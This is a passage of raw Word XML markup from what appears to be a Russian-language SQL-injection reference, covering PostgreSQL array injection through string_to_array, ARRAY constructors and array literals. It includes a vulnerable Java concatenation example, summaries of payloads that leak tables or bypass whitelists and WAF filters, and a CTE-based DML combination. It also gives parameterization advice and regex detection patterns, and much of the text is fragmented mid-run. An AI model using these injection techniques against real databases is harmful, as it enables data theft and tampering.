          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что элемент идёт как typed binding, не как text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Реальная атака — когда array-конструируется на app-level через concat:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">String idsStr = request.getParameter("ids");  // "1,2,3"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">String sql = "SELECT * FROM users WHERE id IN (SELECT unnest(string_to_array('" + idsStr + "', ',')::int[]))";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Идентично Payload A, но в JDBC-окружении. Точка инъекции — string_to_array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — UNION injection через string_to_array; leak любых таблиц.</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B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — UNION через ARRAY-constructor без list-element-валидации.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C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — boolean-tautology через PG array literal + OR true; обход whitelist.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D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JDBC-эквивалент Payload A.</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на `=` или `IN`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANY()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это альтернативный синтаксис.</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WAF на `UNION SELECT`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ловится — но через 3.9.6 (whitespace) или 3.9.5 (encoding) обходится. 3.11.4 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">точка входа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; downstream leak использует общие методы из 3.1.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Type-validation Pydantic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> работает на typed params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list[int]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">); обходится через unstructured типы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">str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list[str]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 на скобки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не работает для PG-array-literals — там скобки фигурные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 круглые.</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`string_to_array(text, text)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стабильная built-in (PG 7.x+). Принимает любой text как input, любой text как separator (1 символ или multi-char).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`ARRAY[...]`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — array-constructor expression; элементы могут быть любым SQL-выражением, включая subquery (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRAY[SELECT id FROM t]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — синтаксис не поддерживается; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRAY(SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — поддерживается, subquery в array).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 b, c}'::int[]`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — array literal в text form. PG-парсер принимает любой text перед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cast выполняется в runtime; на invalid form — ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">malformed array literal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 ANY(array)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SQL-стандартный оператор. Эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x IN (unnest(array))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для optimizer'а.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`x @&gt; y`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — containment. Для array оба должны быть array-типов; PG cast не auto-промотирует scalar в array.</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7.x+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для базовых array; 9.x+ для современных операторов.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SELECT на target.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Application-код</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: f-string или concat с array-aргументом. Параметризация через bind variable (массив через driver typed-array) защищает.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SELECT * FROM users WHERE id = ANY(:ids)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">bind value** (driver typed-array) — безопасно.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SELECT * FROM t WHERE tags @&gt; ARRAY[$1, $2]::text[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">** через bind — безопасно.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string_to_array в reporting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count(*) FROM unnest(string_to_array(:input, ','))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — безопасно если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">:input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака отличается: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f-string или concat в array-aргумент</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — runtime construction.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`string_to_array('` с user-input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — типичный анти-паттерн.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Containment-операторы (`@&gt;`, `&lt;@`, `&amp;&amp;`) с user-controlled array literal в text-form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — индикатор type-confusion attack.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`'{...}'::int[]` в pg_stat_statements с переменным содержимым `{...}`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — массовая array-literal-injection.</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7.x – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — array-фичи стабильны.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11+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — multidimensional array-subscripting (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a[1][2]</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14+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — subscript-syntax для jsonb (комбо с 3.11.2).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — downstream leak в Payload A/B/D после взлома array-точки.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параллельный класс ortogonal к 3.11.4. Combo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11.4 + 3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возможно, но 3.5 в extended-protocol заблокировано (см. 3.5.x).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3.10.1 (Data-modifying CTE)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string_to_array(...) || (WITH ins AS (INSERT ...) SELECT id FROM ins)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комбо array-injection с DML через CTE.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3.11.2 (jsonb)</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data-&gt;'arr' @&gt; '[1,2]'::jsonb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — containment в jsonb-context, аналог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для array.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3.11.3 (xpath)</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xpath(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xml[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; обработка через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-subscript или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">unnest()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пересечение с array-handling.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(Validation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практическая защита: typed array bind, whitelisted separator, schema-validation для query-string parameters.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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bstring_to_array\s*\(\s*['"][^'"]*['"]?\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (concat в string_to_array) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bANY\s*\(\s*ARRAY\s*\[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> рядом с конкатенацией —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3.11 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.11.md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Arrays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — type спецификация.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Array Functions and Operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — string_to_array, unnest, операторы.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Row and Array Comparisons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ANY/ALL semantics.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psycopg3 docs: Adapting Python lists to PostgreSQL arrays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — driver-уровневое маршалирование.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asyncpg docs: Type conversion — arrays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — asyncpg semantics.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pgjdbc docs: Array support</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JDBC array binding.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 in-list expansion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст IN-list.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ANY operator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
